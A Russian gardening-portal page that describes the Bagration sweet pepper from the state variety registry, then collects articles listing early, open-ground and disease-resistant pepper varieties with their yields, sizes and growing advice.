6 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Перец багратион описание сорта

Багратион — сорт растения Перец сладкий

Характеристики сорта:

Свойства сорта Багратион:

Рекомендуемый регион на карте:

Информация о допуске Перец сладкий Багратион из Реестра Госсорткомиссии РФ

Заявка на допуск №39278 , зарегистрирована 2002-12-24 . Сорт Перец сладкий Багратион включен в реестр допущенных в 2003 году . Допущен к использованию в регионах: Северный, Северо-Западный, Центральный, Волго-Вятский, Центрально-черноземный, Северо-Кавказский, Средневолжский .

Оригинатором сорта Перец сладкий Багратион является:

  • ООО СЕЛЕКЦИОННО-СЕМЕНОВОДЧЕСКАЯ ФИРМА `МАНУЛ`
    (141009, МОСКОВСКАЯ ОБЛ., Г.МЫТИЩИ, ЯРОСЛАВСКОЕ Ш., Д.116 А, СТРОЕНИЕ 1)

Другие сорта растения Перец сладкий

Поиск сорта по названию
Подбор сорта
Вопрос экспертам портала

Если вы не нашли ответ на вопрос — не стесняйтесь, задайте вопрос эксперту.

Зарегистрируйтесь или Войдите, чтобы каждый раз не указывать Имя и Электронную почту

Спасибо за комментарий! Он будет опубликован после проверки модератором!

Комментариев еще нет, станьте первым!

Портал для тех, кто любит свою дачу

Ваш вопрос отправлен на модерацию.
Не переживайте, мы быстро проверяем вопросы и ответ на ваш вопрос будет оставлен в течение 1 дня.

Мы обратили внимание, что вы уже зарегистрированы на нашем сайте. Рекомендуем авторизоваться, чтобы просмотреть созданный вопрос. Если вы не помните пароль — можете восстановить его.

Вы не были зарегистрированы до сегодняшнего дня, поэтому мы зарегистрировали вас. Ваш пароль отправлен вам на указанный почтовый ящик.

Помогите нашему сайту развиваться!

Пожалуйста, прочитайте это обращение, оно не отнимет у вас много времени!

Нам так не хватает ваших комментариев и вопросов, чтобы понимать в каком направлении нам развиваться.

Не забудьте оставить комментарий, если вы нашли то что искали.
А если не нашли — задайте вопрос через форму «Спросить эксперта» в шапке сайта.
Мы ответим на этот вопрос, и другие посетители смогут найти ту информацию, которую не смогли найти вы.

С уважением,
команда портала Дача-Дача.ру

Ваш вопрос отправлен на модерацию.
Не переживайте, мы быстро проверяем вопросы и ответ на ваш вопрос будет оставлен в течение 1 дня.

Мы обратили внимание, что вы уже зарегистрированы на нашем сайте. Рекомендуем авторизоваться, чтобы просмотреть созданный вопрос. Если вы не помните пароль — можете восстановить его.

Вы не были зарегистрированы до сегодняшнего дня, поэтому мы зарегистрировали вас. Ваш пароль отправлен вам на указанный почтовый ящик.

Ультраскороспелые и ранние сорта перцев: топ-20

Ранние сорта перца прежде всего выведены для холодных регионов с непродолжительным летом, где могут не успеть вызреть позднеспелые культивары на грядках под открытым небом. Их можно посеять позже, чем обычные сорта, но получить урожай значительно раньше.

Среди опытных огородников зарекомендовали себя такие скороспелые и неприхотливые перцы, как Ласточка и Белозерка. Однако существует множество новых и не очень известных видов, которые по характеристикам во многом превосходят эти проверенные временем сорта.

Суперскороспелые культивары

К ультраранним сортам перца причисляют пасленовые культуры, отдающие урожай через 3-3,5 месяцев с начала вегетации. Ниже представлены лучшие скороспелые виды, предназначенные для культивирования на открытых земельных участках и под укрытиями. Период созревания указан при достижении овощами технической (молочной) спелости. Это означает, что они достигли размеров, характерных для сорта, но еще не полностью поспели. Несмотря на это их можно срывать с кустов и употреблять в пищу.

Румяные щечки

К ультраскороспелым сортам перца относится Румяные щёчки. Снимать плоды с кустов можно спустя 75-80

суток. Ранний культивар хорошо себя чувствует в любых условиях выращивания: будь то открытые грядки или земельные участки с укрытием.

При неполной спелости овощи имеют желто-оранжевый окрас с небольшим румянцем, за счет чего сорт и получил такое интересное название. При полном созревании цвет кожуры сменяется на темно-красный.

Масса одного экземпляра варьирует от 80 до 100 гр., толстостенность на уровне 5-7 мм. С одного куста можно получить до 1,5 кг урожая. Среднерослый стебель не вырастает более 80 см в высоту.

Здоровье

Здоровье относится к самым ранним сортовым перцам. Подходит для земельных участков с защитными

укрытиями. Перчик достигает технической зрелости за 3 месяца после всходов.

Куст высотой 140-170 см, полураскидистый. Растение не подвержено вершинной гнили.

Овощи небольшие, конусовидные весом 50 гр., толстостенностью не выделяются, которая находится в пределах 4 мм.

Рекомендовано выращивание на шпалере с формировкой в 2 стебля. С 1 кв. м. в среднем получают 10 кг овощей.

Особенностью раннего и урожайного культивара является нетребовательность к свету. Поэтому он подходит для посадки в местах, где солнечные лучи редкие гости.

Египетская сила

Ультраранний холодостойкий представитель паслёновых, культивируемый в открытом и защищенном грунте. До наступления технической спелости проходит 3 месяца с момента вегетационного периода.

Низкорослый раскидистый куст вырастает до 50 см в высоту. Египетская сила имеет хорошую устойчивость к основным болезням паслёновых.

Плоды отличаются толстостенностью (0,8-1 см), компактной конусовидной формой, весят порядка 130 гр. Зрелые перчики очень вкусные, сладкие, сочные и ароматные.

Орленок

Для умеренного климата вполне подойдет скороспелый Орленок. Он достаточно хорошо чувствует себя в

открытом грунте. Первые «орлята» достигают технической зрелости спустя 97-107 дней.

Орленок отличается обильным плодоношением и неприхотливостью к условиям выращивания. Пасленовый представитель редко имеет проблемы, свойственные этой культуре, за счет стойкого иммунитета.

Кустики растения компактные, не превышают 30-40 см, имеют букетное расположение плодов. Перцы конусовидной формы имеют достаточно крупные размеры (в среднем 100 гр.) и стенки толщиной до 0,5 см.

Венти

Ультраскороспелый сорт Венти гарантированно вызревает даже на незащищенных укрытиями грядках в местностях с коротким и недружелюбным летом. Некоторые огородники культивируют его в условиях теплицы, получая богатый урожай со стабильным плодоношением.

Стадия молочной спелости наступает через 95-100 суток, после того как появятся сеянцы на поверхности рассадного грунта.

Растение небольшое, не превышающее в высоту 55 см. Перцы конической формы в длину достигают 15 см, а в весе набирают примерно 100-110 гр.

Ранний культивар отличается от себе подобных ремонтантностью. Это означает, что растение способно неоднократно плодоносить в течение одного сезона.

Факир

Очень раннеспелый сорт перцев Факир выведен западно-сибирскими селекционерами. Специально создан для сибирского лета с целью культивирования в грунте открытого и закрытого типа.

Первые овощи можно собирать спустя 90-100 дней, отсчет традиционно ведут с момента появления всходов.

Факир отлично переносит низкие температуры, обладает хорошей устойчивостью к вирусу мозаики и фузариозу.

Небольшие конусовидные перцы красного окраса при полном созревании имеют массу 60-65 гр. Они не могут похвастаться хорошей толщиной стенок, которая составляет всего 3-3,5 мм.

Первенец Романцова

Ультраранний сорт перца Первенец Романцова ценится за стабильный урожай, который он отдает при

любых погодных условиях. Открытый грунт подходит для культивирования этого представителя паслёновых.

Овощи готовы к снятию с растений через 80-112 дней, после того как рассада полностью взойдет.

На компактных кустиках высотой 45-55 см вырастают небольшие конические плоды со средней массой 65 гр., самые крупные экземпляры достигают 150 г.

Первенец Романцова имеет хороший иммунитет, поэтому мало подвержен паслёновым болезням.

Медаль

Один из самых ранних сортов болгарского перца Медаль больше подходит для культивирования в теплицах в регионах с коротким летом. На юге перец можно сажать в открытый грунт.

Урожай собирают, как только пройдет 90-112 дней с момента появления сеянцев. Компактный полураскидистый куст вырастает в условиях теплицы до 1,2 м.

Требует обязательной формировки: удаления пасынков и листьев до первой развилки. Миниатюрные вытянутые плоды весят около 50 г, не отличается хорошей толщиной стенок, которая составляет всего 3-4 мм.

Медаль выделяется погодной стрессоустойчивостью, обилием перцев на одном растении и продолжительным периодом плодоношения.

Ранний культивар наделен иммунитетом по отношению к серой гнили.

Таежный

К скороспелым сортам перца, которые успешно культивируются в открытом грунте, относится Таежный. Фазы молочной спелости он достигает примерно за 100 дней. Растение примечательно карликовым типом куста, не превышающим 30 см.

С 1 кв. м. ранний сорт приносит до 4 кг урожая. Овощи средней величины, красного окраса при полном вызревании. В массе обычно не набирают более 60 г. Культивар отличается дружной урожайной отдачей.

У Таежного хорошая устойчивость к корневым гнилям. Также он мало подвержен мучнистой росе.

Название овощной культуры говорит само за себя: растение подходит для холодного климата и хорошо переносит понижение температуры.

Толстый барин

Один из самых богатых по урожайности сортов, радующий ранней отдачей овощей. Плоды, готовые к снятию с растения, формируются через 90-100 суток. Толстый барин подходит для выращивания на открытых грядках и в защищенном грунте.

Этот ранний перец ценится за высокие вкусовые характеристики с выраженным ароматом, свойственным данной овощной культуре. Толстый барин настоящий гигант: кубовидные плоды могут достигать в весе 400 г, при этом толщина мякоти с кожурой составляет около 0,9 см.

Раннеспелые культивары

Ранние сорта сладкого перца в отличие от ультраскороспелых созревают в среднем на 10 суток позже. Далее представлена лучшая десятка раннеспелых культиваров, зарекомендовавшая себя среди огородников.

Добряк

Раннеспелый перец Добряк отдаёт первый урожай спустя 98-115 суток после появления первых сеянцев.

Разновидность успешно культивируют в защищенных конструкциях и в условиях открытого грунта. Тип куста у сорта штамбовый, сомкнутый. При выращивании под открытым небом не нуждается в подвязке к кольям.

Добряк имеет шаровидную слегка приплюснутую форму. Плоды очень толстостенные – до 1 см при средней массе 100 г одного экземпляра. Полностью вызревший овощ вкусный, отличается сочностью и выраженным перечным ароматом.

Ранний сорт обеспечивает огородников стабильным урожаем даже при неблагоприятных условиях выращивания. Он стойко переносит понижение температуры и плохую освещенность. Наделен стойким иммунитетом к вирусу табачной мозаики.

Винни-Пух

Карликовый ранний сорт перцев для открытого грунта Винни-Пух вызревает на 107-110 день. Это один из немногих культиваров, который способен достигать стадии биологической зрелости прямо на незащищенных грядках даже в северных регионах страны.

Компактный куст высотой 25-30 см крепкий, с букетным расположением плодов. Масса одного перца в среднем составляет 50 г, толщина стенки средняя, варьируется в пределах 5-8 мм. Растение выделяется устойчивостью к поражению тлёй.

Сибирский князь

Культивар относится к крупноплодным сортам с ранней отдачей урожая. Подходит для выращивания в открытом грунте даже в условиях холодного и короткого лета. Техническая спелость наступает на 106-114 день после того, как появятся всходы.

При культивировании на огороде урожайность составляет в среднем 3 кг с кв. м. В условиях защищенного грунта растения отдают в 2 раза больше с той же площади. Красные конические плоды с сочной и мясистой мякотью набирают массу в среднем 200 гр.

Испанский сладкий

Ранние сорт сладкого перца Испанский сладкий не боится ни холода, ни жары и отличается болезнеустойчивостью. Растение культивируют в теплицах и в открытом грунте.

Плоды можно снимать в фазе молочной спелости, которая приходится на 110-115 день после появления всходов. Даже на этой стадии зрелости они имеют хороший вкус.

Крупные удлиненные перцы призмовидной формы имеют вес 200 г и толстую, сочную стенку. Культивар отдает стабильный урожай на протяжении всего сезона выращивания. Высота кустов в среднем составляет 0,7 м.

Белоснежка

Высокоурожайная Белоснежка с ранним сроком созревания отдает урожай в стадии молочной зрелости через 105-110 суток. Подходит для выращивания в пленочных теплицах.

Куст компактный, сомкнутый, относительно невысокий (не более 0,5 м). Плоды треугольной вытянутой формы достигают в длину 12 см при средней массе одного экземпляра 80-100 г. Толщина стенок хорошая – от 5 до 7 мм. Урожайность Белоснежки с 1 кв. м. составляет 7 кг.

Морозко

Скороспелый Морозко при полном созревании отдает толстостенные и сочные плоды. Собирать урожай можно на 112-115 день в фазе молочной зрелости. Предназначен для открытого грунта и пленочных сооружений.

Куст штамбовый, сомкнутый, высотой до 67 см, имеет среднюю облиственность. На одном растении может завязываться до 29 плодов массой до 110 г.

Морозко обладает стойким иммунитетом к болезням паслёновых. Благодаря своей устойчивости к неблагоприятным климатическим условиям идеально подходит для выращивания в северных регионах.

Золотой дождь

Раннеспелый культивар с плодами интересной формы желто-лимонного цвета. В южных регионах Золотой дождь можно высаживать на открытые грядки, в северных – разумнее помещать в теплицу.

Технической зрелости овощи достигают примерно на 116 день с момента появления всходов.

Тип куста идетерминантный, высотой до 0,8 м. Средняя масса одного овоща – 60 г, самые крупные экземпляры могут набирать вес в 0,1 кг.

Ранний сорт отличается хорошей толстостенностью (до 7 мм). Овощ обладает отличным вкусом с выраженным перечным ароматом.

Купец

Техническую спелость Купец набирает к 111 дню после появления массовых всходов. Ранние перцы имеют пирамидальный вид плодов со средней массой 70 гр. По вкусу овощи не уступают позднеспелым култиварам. Они очень сочные, ароматные и толстостенные. Куст компактный, но высокий (до 85 см).

Купец можно выращивать в средней полосе, южных и северных регионах.

Добрыня Никитич

Сорт Добрыня Никитич с ранним сроком созревания включен в Госреестр по РФ. Можно культивировать в незащищенном и закрытом грунте. Первые перцы в фазе молочной зрелости Добрыня отдает на 95-110 день.

Куст низкорослый штамбового, сомкнутого типа. На кв. м. можно высаживать до 12 растений. Урожайность при этом составляет до 4 кг с этой площади.

Плоды красного цвета имеют трапециевидную форму, в весе в среднем достигают 120 гр. Вкусовые качества хорошие, но со слабо выраженным перечным ароматом.

Добрыня Никитич имеет стойкость к такому заболеванию, как вертициллез.

Белый налив

Скороспелый перец Белый налив для открытого и закрытого грунта достигает технической спелости через 95-110 суток после появления сеянцев. Семена перца на рассаду высаживают в начале марта.

Взрослые растения компактные, достигают в высоту 45-55 см. Средний вес одного плода – 60-70 г. при толщине стенок 6 мм.

Ранний сорт Белый налив ценят за хорошую урожайность и образование многочисленных завязей даже при культивировании в холодном климате. Длительное плодоношение, устойчивость к вертициллезу и вирусу табачной мозаики также делают культивар интересным для выращивания на земельных участках в регионах с неблагоприятными климатическими условиями.

Лучшие сорта сладкого перца для открытого грунта и пленочных укрытий

Не каждый перец успеет вырасти и вызреть в условиях короткого лета, при недостатке тепла и света. Для этого требуются низкорослые, скороспелые, устойчивые к пониженным температурам неприхотливые сорта. Значит, плоды у них будут совсем непохожими на сладкие сочные мясистые южные перцы? Вовсе нет. Старые сорта, пригодные для Нечерноземья, и впрямь не отличались особым вкусом. Травянистые и суховатые, с тонкими стенками перцы годились разве что на заготовки. Но благодаря успехам селекционеров сегодня огородникам есть из чего выбирать. Появились новинки с плодами самой разнообразной окраски, от бледно-желтой до фиолетовой, не говоря уже об оранжевой, красной, бордовой, крупные и мелкие, круглые, кубовидные и конусовидные. При этом они имеют компактный куст, что облегчает уход за посадками, холодостойки, не требуют сложных укрытий для выращивания, устойчивы к болезням, вкусны и урожайны.

Ерошка

Очень ранний. Высота куста 30-50 см. Плоды в технической спелости светло-зеленые, при созревании оранжево-красные, кубовидной формы, массой 140-180 г, толщина стенки – 5 мм. Характеризуется дружной отдачей урожая и высокой нагрузкой плодов (до 16 штук на кусте). Сорт идеален для уплотненных посадок ленточным способом (через 12-15 см). Устойчив к вирусу табачной мозаики, вертициллезу, вершинной гнили.

Раннеспелый. Высота куста 50-70 см. Плоды в технической спелости зеленые, при созревании – красные, крупные, конусообразные, массой 140-180, толщина стенки 5-7 мм.

Характеризуется дружной отдачей урожая и прекрасным вкусом. Урожай формируется на двух ярусах. На кусте формируется 12-18 плодов. Устойчив к вирусу табачной мозаики, вертициллезу.

Чардаш

Очень ранний. Высота куста 60-70 см. Плоды в технической спелости желто-оранжевые, при созревании – оранжево-красные, конусовидные, массой 170-220 г, толщина стенки 5-6 мм. Характеризуется хорошим плодоношением, высокой урожайностью, плоды очень декоративны, пригодны к употреблению на любой стадии развития. На кусте формируется 13-17 плодов.

Юнга

Раннеспелый. Высота куста 50-60 см. Плоды в технической спелости темно-зеленые, при созревании – красные, конусовидной формы, массой 130-180 г, толщина стенки 6-7 мм.

Характеризуется хорошей нагрузкой плодами на кусте (8-15 штук), высокими вкусовыми качествами плодов. Подходит для уплотненной посадки.

F1 Буратино

Очень ранний. Высота куста 70 см. Плоды в технической спелости темно-зеленые, при созревании – красные, длинные конусовидные, массой 80-120 г, толщина стенки 5 мм.

Характеризуется дружной отдачей урожая, плоды хорошо хранятся, используются для консервирования. Устойчив к вирусу табачной мозаики и вершинной гнили.

Аккорд

Раннеспелый. Высота куста 70-100 см. Плоды в технической спелости светло-зеленые, при созревании – красные, конусовидные, массой 160-190 г, толщина стенки 6 мм. Характеризуется высокими вкусовыми качествами плодов, пригодностью для консервирования. Устойчив к вирусу табачной мозаики, вертициллезу.

Баргузин

Раннеспелый. Высота куста 80 см. Плоды в технической спелости зеленые, при созревании – желтые, длинные, конусовидные, массой 170-200 г, толщина стенки 6 мм. Характеризуется последовательным плодоношением, приспособленностью к различным условиям выращивания, плоды хороши в свежем виде. Устойчив к вирусу табачной мозаики.

Раннеспелый. Высота куста 50-90 см. Плоды в технической спелости желтоватые, при созревании оранжево-красные, красивой конусовидной формы с округлой верхушкой, 3- камерные, массой 80-160 г, толщина стенки 6-7 мм. Характеризуется дружным плодоношением, хорошей нагрузкой плодов на кусте (20-30 штук), высокой декоративностью и отличными вкусовыми качествами плодов.

Лицедей

Раннеспелый. Высота куста 70-150 см. Плоды в технической спелости светло-зеленые, при созревании – ярко-красные, конусовидные, массой 250-300 г, толщина стенки 6-7мм. Характеризуется высокой урожайностью, оригинальной окраской плодов и нетребовательностью к условиям выращивания. Устойчив к вирусу табачной мозаики.

Корнет

Раннеспелый. Высота куста 80-100 см. Плоды в технической спелости темно-зеленые, при созревании – коричневые, пониклые, призмовидные, массой 180-200 г, толщина стенки 5-6 мм. Характеризуется хорошей завязываемостью плодов, непрерывным плодоношением, плоды обладают повышенным содержанием витамина С и каротина.

Раннеспелый. Высота куста 80-100 см. Плоды в технической спелости зеленые, при созревании – красные, плотные, тяжелые сочные, направлены вверх, сердцевидно-призмовидные, массой 160-260 г, толщина стенки 8-10 мм. Характеризуется высокими вкусовыми качествами плодов, повышенной лежкостью и транспортабельностью, слабой осыпаемостью цветков.

Улыбка

Раннеспелый. Высота куста 70-100 см. Плоды в технической спелости зеленые, при созревании – красные, конусовидные, массой 180-250 г, толщина стенки 6-7 мм. Характеризуется стабильной урожайностью, хорошим вкусом плодов (пригодны в пищу на ранних стадиях развития). Устойчив к вирусу табачной мозаики.

Раннеспелый. Высота куста 80 см. Плоды в технической спелости светло-зеленые, при созревании – желтые, кубовидные, ребристые, массой 150-200 г, толщина стенки 6-8 мм. Характеризуется хорошей урожайностью, плоды используются в свежем виде и для консервирования. Устойчив вирусу табачной мозаики, вертицилезу и вершинной гнили.

Лучшие сорта сладкого перца, устойчивые к вирусным заболеваниям

При выращивании перцев садоводы сталкиваются с тем, что рассада иногда болеет. Заболевание может отразиться на качестве будущего урожая и даже полностью его загубить. Поэтому при выращивании культуры нужно брать сорта, устойчивые к вирусным заболеваниям. Они подходят для открытого грунта и теплиц, а сами растения вырастают крепкими и хорошо плодоносят в дальнейшем.

Фунтик

Полудетерминантные растения предназначены для выращивания в уличных условиях и для теплиц. Кусты компактные, на участке не занимают много места, их высота — 50-70 см. Листьев образуется много. С момента посева семян до сбора урожая проходит от 110 до 120 дней. Перцы образуются активно, биологическая зрелость наступает спустя 10-15 дней. Разновидность устойчива к вертициллезному увяданию, вирусу табачной мозаики, другим вирусным болезням.

Перцы с формой неровной призмы и с гладкими гранями. Вес составляет от 140 до 170 г, высота 12-14 см. Толщина шкурки не больше 7 мм. На каждом кусте одновременно вызревает порядка 12-18 плодов. Шкурка во время биологической зрелости становится ярко-красной с глянцевым отливом. Основное предназначение плодов – переработка и свежее потребление. Овощи пригодны к длительному хранению.

Достоинства у Фунтика следующие:

  • возможность уличной посадки;
  • неприхотливость в выращивании;
  • компактные кусты;
  • ранний срок поспевания урожая;
  • высокая стойкость к вирусным инфекциям.

Из-за обильной облиственности кустов при высаживании рекомендуется отступать расстояние от соседнего растения не менее 40 см. Густота посадки — не более 5 кустиков на кв.м.

Буратино

Легким в разведении сортом садоводы признают гибрид Буратино. Растение не требует пасынкования, поскольку растет в 2-3 стебля, пасынков немного. Максимальная высота куста – 90-100 см при тепличном выращивании, подвязка необязательна. В уличном грунте сорт можно выращивать, но перцы будут созревать дольше на 2-3 недели. В закрытом грунте зрелость наступает спустя 90 дней с начала выращивания рассады. Урожайность сорта при соблюдении агротехники впечатляет: про 10-13 кг с кустика.

Вкусовые качества у перчиков высокие: сладковатая мякоть успешно применяется для приготовления салатов, лечо, кетчупов. Цвет шкурки ярко-красный. На каждом кусте формируется по 13-15 завязей. Вес одного перца – 100-120 г, длина – 10 см. Шкурка тоненькая, 4-6 мм. Буратино обладает множеством положительных качеств:

  • стойкость к похолоданию;
  • хороший иммунитет;
  • засухоустойчивость;
  • привлекательный вид;
  • длительный срок хранения.

Недостатков у сорта нет. Буратино успешно выращивают тысячи садоводов по территории России, Украины, Белоруссии.

Аккорд

Для тепличного выращивания отлично подходит сорт Аккорд. Он отличается среднеранним сроком поспевания, дает плоды уже спустя 70 дней после высадки. В уличной земле Аккорд можно выращивать на юге, перемен в климате растения не любят. Сорт считается гибридом, обладает сильной иммунной устойчивостью, не поражается болезнями и вредителями, свойственных культуре. Урожайность стабильная — 7-8 кг плодов с посадочного метра. Кустики аккуратные, но мощные, длина стебля не превышает 60 см. Подвязывать куст не нужно.

Перцы развиваются быстро, длина — 10-11 см. Один перчик весит 130-160 г, окраска меняется от бежевого до оранжево-красного цвета. Форма конусовидная, без ребристости. Перчики подходят для фарширования и изготовления лечо. Для свежего употребления плоды также подходят, поскольку обладают сочным сладковатым привкусом. Достоинствами Аккорда являются:

  • быстрое поспевание;
  • универсальное назначение;
  • хорошая урожайность;
  • устойчивость к вирусам.

Садоводы отмечают, что гибрид нуждается в высокой температуре при выращивании. Она не должна быть ниже 22 градусов тепла. Продолжительность светового дня для рассады должна быть не менее 14 часов, поэтому весной растения необходимо дополнительно досвечивать лампами.

Красный бык

Для любителей крупных перцев агрономы вывели сорт Красный бык. Кусты раскидистые, устойчивые к пониженным температурам и вирусным заболеваниям. Сорт пригоден для посадки на улицу, но может успешно выращиваться в тепличном грунте. Красный бык — гибрид со среднеранним сроком поспевания плодов. Урожай собирают через 115 дней после появления всходов. Показатель урожайности составляет 10-12 кг перчиков с одного посадочного метра.

Особенностью гибрида являются его перцы исполинского размера. Шкурка у перчиков ярко-красного цвета, в меру толстая, прочная. Плоды могут долго храниться. Они обладают прекрасным сладким вкусом, а мякоть содержит много сока. В длину плоды вырастают до 20 см, весят по 200 г. Хозяйки используют овощ для заготовок: для кетчупов, лечо, закусок.

Достоинства Красного быка такие:

  • крупные овощи с хорошим вкусом;
  • устойчивость к болезням и вредителям;
  • высокая урожайность;
  • лежкость.

Сорт требователен к выращиваемому грунту и хорошо реагирует на подкормки. Рекомендуется использовать минеральные и органические удобрения.

Детерминантные кусты высотой по полметра, отличаются компактностью и не занимают много места в огороде. Растения можно высаживать с плотностью 5-6 кустов на 1 кв.м, они не мешают друг другу развиваться. Уход минимальный – в подвязке и пасынковании необходимости не возникает. Сорт отлично растет в уличном грунте, возможна посадка под пленку. Стадия технической спелости наступает спустя 105-110 дней с посева семян на рассаду. Через неделю перчики начинают достигать красной окраски. На кусте образуется от 8 до 15 овощей.

Насладиться вкусом перчиков можно со второй половины лета. Плоды поспевают очень аппетитными: красная глянцевая шкурка блестит на солнце. Форма конусовидная, немного ребристая. Толщина перикарпия составляет 5-7 мм, масса перчика – 150 г. Вкус сладкий, без кислинки, мякоть сочная. Юнгу выращивают для свежего потребления, используют в заготовках и для фарширования. Достоинства у культуры представлены ниже:

  • небольшие кусты;
  • минимальный уход;
  • отличные вкусовые свойства;
  • устойчивость к болезням и вредителям.

При выращивании Юнги недочетов замечено не было, на рынке агрокультур он занимает лидирующую позицию.

Чардаш

В открытом грунте в Средней полосе России можно вырастить разновидность Чардаш. Она считается раннеспелой, поскольку на созревание уходит порядка 120 дней. Кусты невысокие, не более 60 см. Подвязка к опоре не нужна, поскольку стебель толстый. Пасынкообразование у растения умеренное, поэтому можно не формировать. В сезон с одного посадочного метра удается собрать до 10 кг плодов. Чардаш не восприимчив к вирусу табачной мозаики, не заражается вертициллезом и прочими заболеваниями.

Конусовидные перцы достигают в стадии биологической зрелости принимают красно-бордовый окрас. Шкурка в меру тонкая, примерно 6 мм. Плоды довольно крупные, весом по 200-250 г. Их выращивают для употребления в свежем виде и для консервации. Чардаш можно долго хранить, перчики без проблем переживают даже длительную транспортировку. Достоинствами Чардаша называют:

  • товарность;
  • устойчивость к пониженным температурам;
  • хорошую иммунную способность;
  • неприхотливость в выращивании.

Иногда перчики достигают только желто-оранжевой окраски, которая не переходит в красную.

Лицедей

К урожайной разновидности относится сорт Лицедей. Растения быстро достигают технической зрелости, за 90-100 дней. Высота кустов – от 90 до 15- см, подвязка к опоре рекомендуется. Побеги и листья располагаются густо. Сорт отличается высоким показателем урожайности – 11 кг с кв.м, нагрузка на куст высокая – по 25-30 плодов на каждое растение. Лицедей не поражается вирусом табачной мозаики, вертициллезом. Культуру выращивают как в парниках, так и на улице, к условиям выращивания Лицедей не прихотлив.

Плоды имеют конусовидную вытянутую форму и три камеры. Длина перчика составляет от 15 до 20 см. Вкус шкурки сладкий, очень сочный и ароматный. Окрас меняется по мере достижения спелости от светло-зеленого цвета до насыщенного красного. Плоды привлекательные, массой по 250 г, с толщиной стенок 5-6 мм. Лицедей – разновидность салатного и консервного назначения. Лицедей имеет ряд положительных качеств:

  • неприхотливый уход;
  • стабильный показатель урожайности;
  • хороший иммунитет;
  • аппетитная правильная форма.

К недостаткам сорта относят высоту кустов, они занимают много места на участке. Густота посадки не должна превышать 3-4 растения на квадратный метр.

Багратион

Для тепличной посадки садоводы предпочитают разновидность Багратион. Это среднеранний сорт со сроком созревания в 3,5 месяца. Полудетерминантные кусты в росте чуть превышают метровую отметку, не более. Подвязка рекомендуется. Багратион устойчив к вирусу табачной мозаики, вершинной гнили и к вертициллезному увяданию. Урожайность при соблюдении правильной техники агровыращивания составляет не менее 10 кг с кв.м.

В период биологического созревания зеленая окраска становится желтой. Плоды крупные, имеют аппетитную кубовидную форму. Масса перчика составляет примерно 200 г, толщина стенок – 6-8 мм. Багратион выращивают для свежего потребления, а также для консервирования. Среди положительных качеств у Багратиона отмечают:

  • высокий показатель урожайности;
  • хороший вкус;
  • стойкость к вирусным инфекциям;
  • товарную форму.

Недостаток у сорта один – боязнь похолоданий. В Средней полосе и на Урале агрономы рекомендуют выращивать культуру только в защищенном грунте. На юге возможна посадка в открытый грунт.

Нафаня

Отличными иммунными характеристиками обладает разновидность Нафаня. Его выращивают в открытом грунте даже в Средней полосе и на Урале, растения растут без всяких проблем, отлично переносят небольшие похолодания и проявляют стойкость к грибковым спорам и вирусным болезням. Высота взрослого куста умеренная, 60-70 см. Период плодоношения немного растянут, что позволяет собирать урожай до самых заморозков, почти до середины осени. Урожайность стабильная – не ниже 8 кг с кв.м, количество плодов на одном кусте – 14-18 штук.

Плоды имеет темно-красный цвет с глянцевым отливом. Весит каждый перчик 180 г, на вкус сладкий и приятный. Форма конусовидная, кончик у перца немного заострен. Искривления нет, у овощей товарный вид, поэтому их часто выращивают для продажи. Выращивают культуру, чтобы кушать просто так, с грядки, но можно использовать для приготовления лечо и других закусок. Достоинствами Нафани являются:

  • отличный вкус;
  • долгая лежкость;
  • привлекательный вид;
  • стойкость к болезням.

Недостатков у разновидности нет, агрономы и садоводы рекомендуют ее к выращиванию даже новичкам, поскольку проблем с ней не возникнет.

При посадке перчиков обязательно обрабатывают грунт и семена от возможных бактерий и вирусов. Даже при выращивании сортов, устойчивым к болезням, не стоит пренебрегать профилактическими мерами. Минимально 2 раза в сезон рассаду опрыскивают фунгицидными препаратами или народными средствами, они помогут укрепить иммунные качества растений и снизят вероятность заражения до нуля.

Лучшие сорта Перца для теплиц и открытого грунта [Выпуск 3 из 3]

Перец Гогошары — описание сорта

Гогошары — один из полюбившихся сортов российских садоводов. Выращивают данный сорт в основном в южной и средней полосе России. Родиной перчиков круглой формы считается Молдова. Растение тепло- и светолюбивое, его нужно защищать от ветра, поэтому желательно выращивать в теплицах, или покрывать укрывным материалом.

Семена сеют на рассаду в конце февраля, высаживают на подготовленное на участке место в мае. Растение довольно раскидистое, густо-зеленое, высотой около 0,5-1 метра. При посадке оставляют расстояние между кустами порядка 50 см. Плоды растение начинает приносить в середине июля.

Если на участке имеется теплица, стоит посадить перцы пораньше, например в первых числах февраля, тогда можно успеть собрать 2 урожая за один сезон.

Плоды у данного сорта округлой формы, иногда имеют грани, напоминают форму томатов или маленьких тыковок. Существует множество подвидов данного сорта, отличаются сорта цветом плодов, в основном плоды красные, но встречаются желтые и фиолетовые сорта. Масса перцев-шаров от 80 до 200 грамм, в зависимости от подвида.

Судя по отзывам, к достоинством перца большинство относит его вкусовые качества, высокую урожайность, (при достаточном уходе можно собрать до 3,5 кг с одного куста растения), мясистость и сочность плодов, длительное хранение. Что касается недостатков сорта, к ним садоводы отнесли то, что растения не переносят засухи и недостатка тепла, света, ломкость стеблей и подверженность к различным заболеваниям.

Перец Толстый Барон — описание сорта, фото и отзывы

Толстый Барон — сладкий перец раннего созревания. Растения начинают плодоносить спустя 90-110 дней после прорастания всходов, до полной окраски плодов может пройти еще 10-15 дней. Перцы Барона крупные,в длину 25 см, красного цвета, имеют глянцевую структуру, прямоугольную форму с отчётливыми гранями, толстые стенки(7-10 мм), вес плодов 150-200 грамм, некоторые экземпляры достигают в весе до 500 грамм. Плоды очень ароматные, сочные, с приятным сладким вкусом, доля сахара в составе перца около 10%.

Сорт перца «Толстый Барон» теплолюбивый, поэтому предпочтительнее выращивать его в теплицах или под укрытиями. Для посадки обязательно использовать рассадный метод, садить можно сразу в стаканчики по 1-2 семени, после всходов, слабые побеги удалить, оставив более мощные растения. Это позволит избежать пересадки растений, так как перец этого не любит. Если же семена были высажены в общий контейнер, необходимо произвести пикировку растений. После пикировки можно заметить остановку в росте у перцев, в этот момент нужно обеспечить достаточную влажность и освещенность рассады, желательно не переставлять ящики с рассадой с места на место. Рассаду сеют в середине февраля, на постоянное место пересаживают спустя 2 месяца на расстоянии 40-60 см друг от друга.

Для того, чтобы семена дружно взошли, необходимо провести обработку семян стимуляторами роста, такими как Эпин, Циркон или использовать сок алоэ

